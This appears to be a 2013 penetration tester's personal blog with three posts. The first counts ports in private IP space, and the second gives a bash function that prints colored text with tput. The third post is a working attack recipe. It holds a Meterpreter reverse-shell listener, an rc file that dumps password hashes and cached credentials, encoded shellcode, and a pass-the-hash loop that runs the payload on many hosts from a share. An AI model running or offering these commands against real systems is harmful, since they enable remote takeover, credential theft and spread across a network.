Wednesday, August 21, 2013

Number of Potential Ports in Private IP Space

So this is kind of interesting and it might be useful in the future.

The 10/8 network has 16,777,216 addresses

The 172.16/12 network has 1,048,576 addresses

The 192.168/16 network has 65,536 addresses

Combine those with 65,536 port numbers for TCP and the same for UDP and you get over 2.3 trillion (2,345,052,143,616) potential service endpoints.

So next time someone wants you to scan their private IP space, doesn't tell you what ranges there are and expects you to do it in 2 weeks, tell them to politely fuck off.
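The same count, computed from the CIDR blocks with the standard library's ipaddress module, as an added example that is not part of the original post. It goes a step further than the arithmetic above: overlapping or duplicated blocks in a scope list are collapsed first, so an address is never counted twice.

```python
"""Count potential service endpoints (address x port x protocol) in a scope
given as CIDR blocks. Added example, not the author's code; standard library only."""
import ipaddress

PORTS_PER_PROTOCOL = 65536  # ports 0-65535
PROTOCOLS = 2               # TCP and UDP

# Constructed sample scope: the three RFC 1918 blocks from the post.
RFC1918 = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"]


def address_count(cidrs):
    """Number of distinct addresses in the given CIDR blocks.

    Overlapping or duplicated blocks are collapsed first (e.g. 10.0.0.0/8
    together with 10.1.0.0/16 still counts as 2**24 addresses).
    """
    nets = ipaddress.collapse_addresses(
        ipaddress.ip_network(c, strict=False) for c in cidrs
    )
    return sum(n.num_addresses for n in nets)


def endpoint_count(cidrs, ports=PORTS_PER_PROTOCOL, protocols=PROTOCOLS):
    """Potential service endpoints: every address times every port on every protocol."""
    return address_count(cidrs) * ports * protocols


if __name__ == "__main__":
    print(f"{address_count(RFC1918):,} addresses")
    print(f"{endpoint_count(RFC1918):,} potential TCP+UDP endpoints")
```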

Thursday, August 15, 2013

echo colored text in bash

Lots of tutorials tell you to use "echo -e [blahblah" style ANSI escape sequences to generate the colors for output. First of all, those are practically impossible to read, they look like magic, and it's a bitch to track down a typo.

tput was created a while ago to remedy those issues. I've created a function/script that can be included in other scripts to easily generate colors.
#!/bin/bash
# Print text in a named color using tput instead of hand-typed ANSI escapes.
echo_color() {
 case ${1} in
 black)
  shift 1
  #echo $(COLOR)${user-supplied-text}$(NORMAL-COLOR)
  echo "$(tput setaf 0)${*}$(tput sgr0)"
  ;;
 red)
  shift 1
  echo "$(tput setaf 1)${*}$(tput sgr0)"
  ;;
 green)
  shift 1
  echo "$(tput setaf 2)${*}$(tput sgr0)"
  ;;
 yellow)
  shift 1
  echo "$(tput setaf 3)${*}$(tput sgr0)"
  ;;
 blue)
  shift 1
  # setaf 4 is blue (setaf 1 is red)
  echo "$(tput setaf 4)${*}$(tput sgr0)"
  ;;
 cyan)
  shift 1
  echo "$(tput setaf 6)${*}$(tput sgr0)"
  ;;
 magenta)
  shift 1
  echo "$(tput setaf 5)${*}$(tput sgr0)"
  ;;
 white)
  shift 1
  echo "$(tput setaf 7)${*}$(tput sgr0)"
  ;;
 underline)
  #yes i know its not a color, its still usefull though.
  shift 1
  # smul is its own terminfo capability, not an argument to setaf
  echo "$(tput smul)${*}$(tput sgr0)"
  ;;
 custom)
  color_code=${2}
  shift 2
  echo "$(tput setaf "${color_code}")${*}$(tput sgr0)"
  ;;
 ls-color-codes)
  # 256-color terminals number their colors 0-255; 16 per row gives a 16x16 box
  for i in $(seq 0 255); do
   tput setaf "${i}"
   printf " %3s" "$i"
   tput sgr0
   if [ $((($i + 1) % 16)) -eq 0 ] ; then
    echo #New line
   fi
  done
  ;;
 *)
  cat <<USAGE
This script will echo your text as a specified color.

Usage:
 $0 <color> <text>
 $0 custom <color-code> <text>
 $0 ls-color-codes
USAGE
  ;;
 esac
}
echo_color "$@"
I'm particularly happy with the ls-color-codes argument: it prints a 16x16 box of the color codes, each shown in its own color.

Happy scripting!

Tuesday, August 13, 2013

Automating Meterpreter from bash

This is pretty disgusting and a stupidly unstable hackjob, but it worked and this blog is more for notes for myself anyway...


Generate the post-exploitation command rc file:

cat > /root/automsf.rc <<EOF
getsystem
run post/windows/gather/smart_hashdump
run post/windows/gather/cachedump
exit
EOF

Then run msfconsole to listen for the callback:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.10
set AutoRunScript multi_console_command -rc /root/automsf.rc
exploit -j -z
Then generate the payload to use with sce:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.1.1.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
Then run the for loop while serving sce from a share:
for i in `cat file-of-smb-hosts`; do 
echo grabbing $i; 
winexe-PTH -U 'DOM\user%password' --uninstall //$i 'cmd.exe /c \\10.10.10.10\smb_share\sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lzHOys0uP30aplIKUfQn2QtNkf2vPNk0RdLlK0RftLK42Q86oMg1ZFFVQKOUayPLlElQqqlgrFL5piQXOdMGqzgxbHpaBCgLKV26pnkqR7LVaHPNk1PT8NeYP440J31zpbplKsx6xnkCha0uQiC8cGLBink4tNk7qIFp1io5aiPLlYQjodMwqO7GH9El45S1mIhEkQmtd1eZB3hnkchGTVaiC0fnkTL0KLKpXgluQkcnkwtlKC1xPLIRd14ddQKaKU1Ci1JCa9o9paHSopZNk7bXkmV3mE8FSTrWps0RH3Gt3p2copTBHPL47gVVgYoyEoHj0eQc0ePwYzdRtpPPhWYm; 
done

Now it should iterate through all of the IPs in the text file, executing sce from a share (no hard drive footprint) and executing the callback to your msfconsole listener. It then auto-loads the rest of the payload, executes the .rc file, and exits. Rinse and repeat with the next IP.